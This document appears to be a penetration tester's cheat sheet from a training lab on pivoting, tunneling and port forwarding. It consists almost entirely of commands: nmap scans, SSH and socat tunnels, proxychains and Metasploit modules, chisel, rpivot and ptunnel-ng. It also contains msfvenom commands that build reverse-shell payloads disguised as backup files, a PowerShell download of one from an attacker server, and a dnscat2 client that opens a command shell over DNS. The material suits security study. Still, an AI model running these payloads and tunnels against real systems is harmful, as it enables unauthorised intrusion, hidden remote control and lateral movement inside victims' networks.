Pivoting-tunneling-and-port-forwarding

Network Configuration and Monitoring

# Display network configurations
ifconfig  
### Linux command to display current network configurations.

ipconfig  
### Windows command to display current network configurations.

# Display routing table
netstat -r  
### Displays the routing table for all IPv4-based protocols.

# Netstat for monitoring
netstat -antp | grep 1234  
### Linux: Filter network connections for port 1234.

netstat -antb | findstr 1080  
### Windows: List TCP connections on port 1080.

---

Nmap

# Basic port scanning
nmap -sT -p22,3306 <IPaddressofTarget>  
### Scan for open SSH or MySQL ports.

nmap -v -sV -p1234 localhost  
### Scan localhost on port 1234 with version detection.

---

SSH and Tunneling

# SSH tunneling
ssh -L 1234:localhost:3306 Ubuntu@<IPaddressofTarget>  
### Create SSH tunnel to remote MySQL service.

ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@<IPaddressofTarget>  
### SSH tunnel for multiple ports.

ssh -D 9050 ubuntu@<IPaddressofTarget>  
### Dynamic port forwarding for SOCKS proxy.

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 ubuntu@<ipAddressofTarget> -vN  
### Reverse SSH tunnel.

---

Proxychains

# Proxychains configuration
tail -4 /etc/proxychains.conf  
### View last 4 lines of proxychains config.

# Proxychains usage
proxychains nmap -v -sn 172.16.5.1-200  
### Proxychains with Nmap ping scan.

proxychains msfconsole  
### Launch Metasploit through Proxychains.

---

Metasploit

# Module search and usage
msf6 > search rdp_scanner  
### Search for RDP scanner module.

msf6 > use exploit/multi/handler  
### Select multi-handler module.

msf6 > use auxiliary/server/socks_proxy  
### Use SOCKS proxy module.

msf6 auxiliary(server/socks_proxy) > jobs  
### List running jobs.

msf6 > use post/multi/manage/autoroute  
### Select autoroute module.

---

File Transfer

scp backupscript.exe ubuntu@<ipAddressofTarget>:~/  
### SCP file transfer to remote host.

scp -r rpivot ubuntu@<IPaddressOfTarget>  
### SCP entire directory to target.

# Python HTTP server
python3 -m http.server 8123  
### Start HTTP server on port 8123.

# PowerShell file download
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"  
### Download file using PowerShell.

---

Metasploit Payloads

msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080  
### Create Windows reverse HTTPS payload.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPofAttackHost> -f elf -o backupjob LPORT=8080  
### Create Linux reverse TCP payload.

---

Socat

socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofAttackHost>:80  
### Forward port 8080 to attack host port 80.

---

Plink

plink -D 9050 ubuntu@<IPaddressofTarget>  
### Plink dynamic port forwarding.

---

SSHuttle

sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0 -v  
### Create route through target network.

---

RPivot

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0  
### Start RPivot server.

python2.7 client.py --server-ip 10.10.14.18 --server-port 9999  
### Connect RPivot client to server.

---

DNScat2

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache  
### Start DNScat2 server.

Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd  
### PowerShell client connection.

---

Chisel

./chisel server -v -p 1234 --socks5  
### Start Chisel server.

./chisel client -v 10.129.202.64:1234 socks  
### Connect Chisel client to server.

---

Ptunnel-ng

sudo ./ptunnel-ng -r10.129.202.64 -R22  
### Start Ptunnel-ng server.

sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22  
### Connect Ptunnel-ng client.

---

Windows PortProxy

netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25  
### Add portproxy rule.

netsh.exe interface portproxy show v4tov4  
### Show portproxy configuration.